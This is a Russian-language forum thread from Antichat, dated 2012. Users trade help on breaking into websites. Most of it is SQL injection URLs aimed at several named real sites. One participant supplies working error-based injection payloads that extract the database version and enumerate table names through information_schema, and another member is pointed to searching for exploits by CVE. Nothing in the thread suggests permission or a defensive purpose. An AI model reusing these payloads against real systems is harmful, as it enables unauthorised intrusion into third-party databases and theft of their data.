HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19511  
Старый 05.02.2012, 17:18
Tr[1]x
Guest
Сообщений: n/a
Провел на форуме:
7275

Репутация: 0
По умолчанию

Можно ли как-то использовать данные уязвимости?

 
Ответить с цитированием

  #19512  
Старый 05.02.2012, 18:21
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

2Tr[1]x,

Можно.

P.S. Что за прога?
 
Ответить с цитированием

  #19513  
Старый 05.02.2012, 18:44
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
2Tr[1]x
,
Можно.
P.S. Что за прога?
программа Xspider
 
Ответить с цитированием

  #19514  
Старый 05.02.2012, 18:46
Tr[1]x
Guest
Сообщений: n/a
Провел на форуме:
7275

Репутация: 0
По умолчанию

Ereee, не подскажешь как именно?
 
Ответить с цитированием

  #19515  
Старый 05.02.2012, 18:47
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от Tr[1  
x"]
Tr[1]x said:
Ereee
, не подскажешь как именно?
Обычно сканеры показывают CVE. По нем ищи сплойт в гугле.
 
Ответить с цитированием

  #19516  
Старый 05.02.2012, 20:30
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

ТАксс, пару вопросов

Цитата:
Сообщение от None  
http://kvikmyndir.is/frettir/frett/?id=104374
не могу вывести данные через еррор, кто что подскажет

второе

Цитата:
Сообщение от None  
http://www.eeagrants.lv/?id=-10+limit+0,0+union+select+version%28%29,version%28 %29,version%28%29--+
Цитата:
Сообщение от None  
http://crumbweb.org/getInterviewDetail.php?id=-11+limit+0,0+union+select+version%28%29,version%28 %29,version%28%29--+
в обоих случаях стольбы подобрал но на екран ничего не выводит, крутить как блинд не избежно или всётаки ожно чтонибуть сделать?

и наконец третее

Цитата:
Сообщение от None  
http://www.57productions.com/article_reader.php?id=11
что в запрос не подставлю постоянно вылетает только ошибка и никакого вывода, как быть?
 
Ответить с цитированием

  #19517  
Старый 05.02.2012, 20:45
kravch_v
Guest
Сообщений: n/a
Провел на форуме:
45485

Репутация: 1
По умолчанию

qaz,

третье - слепая

вторая - слепая, попробуй что-нибудь сделать.
 
Ответить с цитированием

  #19518  
Старый 05.02.2012, 20:49
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

qaz

первый

http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--+

второй наверное слепая

3

http://www.57productions.com/article_reader.php?id=11+or+1+group+by+concat(vers ion(),floor(rand(0)*2))having+min(0)+or+1--+

третья ветка, поэтому юнион не катит
 
Ответить с цитированием

  #19519  
Старый 05.02.2012, 21:00
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
qaz
первый
http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--+
о, спасибо, вот прблемка, хотел перебрать таблици, на какой бы лимит не подставил серовно показывает одну и туже таблицу

Цитата:
Сообщение от None  
http://kvikmyndir.is/frettir/frett/?id=104374,%28select%201%20from%28select%20count%2 8*%29,concat%28table_name,0x00,floor%28rand%280%29 *2%29%29x%20from%20information_schema.tables%20gro up%20by%20x%20limit%202,1%29a%29%29--+
может я не туда его влепил?
 
Ответить с цитированием

  #19520  
Старый 05.02.2012, 21:03
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
о, спасибо, вот прблемка, хотел перебрать таблици, на какой бы лимит не подставил серовно показывает одну и туже таблицу
может я не туда его влепил?
http://kvikmyndir.is/frettir/frett/?id=104374,(select 1 from(select count(*),concat((select+table_name+from+informatio n_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ